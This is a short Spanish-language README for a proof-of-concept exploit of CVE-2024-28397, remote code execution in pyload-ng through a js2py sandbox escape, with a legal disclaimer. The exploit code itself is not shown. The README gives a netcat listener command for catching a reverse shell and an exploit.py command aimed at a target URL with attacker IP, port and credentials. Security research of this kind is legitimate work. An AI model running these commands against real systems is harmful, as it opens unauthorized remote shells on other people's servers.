
Exploit PoC para CVE-2024-28397 – Ejecución remota de código en pyload-ng mediante escape de sandbox de js2py
Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2024-28397, una vulnerabilidad de Ejecución Remota de Código que afecta a pyload-ng debido al uso inseguro de js2py.
Aviso legal:
Esta PoC es solo para fines educativos y de investigación.
No la utilices en sistemas que no poseas o para los que no tengas permiso explícito de prueba.
El autor no es responsable del mal uso de este código.
js2py en pyload-ngNecesitarás Python 3.x, la librería requests y netcat para capturar la reverse shell.
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123